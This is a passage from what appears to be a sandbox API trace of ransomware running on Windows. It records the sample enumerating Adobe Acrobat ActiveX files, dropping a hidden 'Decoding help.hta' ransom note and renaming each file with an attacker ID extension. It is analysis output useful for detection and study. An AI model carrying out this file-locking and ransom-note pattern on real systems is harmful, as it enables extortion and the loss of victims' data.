lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.488] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.488] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0052.488] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0052.489] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.489] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0052.489] CloseHandle (hObject=0xffffffff) returned 0 [0052.489] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0052.489] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.EUQ") returned -1 [0052.489] lstrlenW (lpString="PDFShell.EUQ") returned 12 [0052.489] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.489] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.489] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.EUQ" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.EUQ") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.EUQ" [0052.489] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.EUQ" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.EUQ") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.EUQ" [0052.489] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.EUQ", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.EUQ.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.EUQ.[ID]g9uZrLhJaygpwRm1[ID]" [0052.489] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.EUQ" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.euq"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.EUQ.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.euq.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.489] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80567fc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49800, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.FRA", cAlternateFileName="")) returned 1 [0052.489] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.489] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.489] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0052.489] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0052.490] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.490] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0052.490] CloseHandle (hObject=0xffffffff) returned 0 [0052.490] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0052.490] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.FRA") returned -1 [0052.490] lstrlenW (lpString="PDFShell.FRA") returned 12 [0052.490] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.490] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.490] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.FRA" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.FRA") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.FRA" [0052.490] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.FRA" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.FRA") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.FRA" [0052.490] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.FRA", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.FRA.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.FRA.[ID]g9uZrLhJaygpwRm1[ID]" [0052.490] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.FRA" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.fra"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.FRA.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.fra.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.490] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d5bd20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.HRV", cAlternateFileName="")) returned 1 [0052.490] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.490] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.490] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0052.490] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0052.491] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.491] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0052.491] CloseHandle (hObject=0xffffffff) returned 0 [0052.491] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0052.491] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.HRV") returned -1 [0052.491] lstrlenW (lpString="PDFShell.HRV") returned 12 [0052.491] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.491] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.491] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.HRV" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HRV") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HRV" [0052.491] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HRV" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HRV") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HRV" [0052.491] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HRV", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HRV.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HRV.[ID]g9uZrLhJaygpwRm1[ID]" [0052.491] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HRV" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.hrv"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HRV.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.hrv.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.491] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d5bd20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.HUN", cAlternateFileName="")) returned 1 [0052.491] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.491] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.491] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0052.491] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0052.492] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.492] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0052.492] CloseHandle (hObject=0xffffffff) returned 0 [0052.492] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0052.492] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.HUN") returned -1 [0052.492] lstrlenW (lpString="PDFShell.HUN") returned 12 [0052.492] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.492] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.492] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.HUN" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HUN") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HUN" [0052.492] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HUN" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HUN") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HUN" [0052.492] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HUN", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HUN.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HUN.[ID]g9uZrLhJaygpwRm1[ID]" [0052.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HUN" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.hun"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.HUN.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.hun.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.492] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80567fc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49800, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.ITA", cAlternateFileName="")) returned 1 [0052.492] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.492] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.492] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0052.492] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0052.492] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.493] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0052.493] CloseHandle (hObject=0xffffffff) returned 0 [0052.493] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0052.493] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.ITA") returned -1 [0052.493] lstrlenW (lpString="PDFShell.ITA") returned 12 [0052.493] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.493] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.493] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.ITA" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ITA") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ITA" [0052.493] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ITA" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ITA") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ITA" [0052.493] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ITA", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ITA.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ITA.[ID]g9uZrLhJaygpwRm1[ID]" [0052.493] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ITA" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.ita"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.ITA.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.ita.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.493] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80567fc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.JPN", cAlternateFileName="")) returned 1 [0052.493] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.493] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.493] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0052.493] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0052.493] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.494] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0052.494] CloseHandle (hObject=0xffffffff) returned 0 [0052.494] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0052.494] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.JPN") returned -1 [0052.494] lstrlenW (lpString="PDFShell.JPN") returned 12 [0052.494] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common 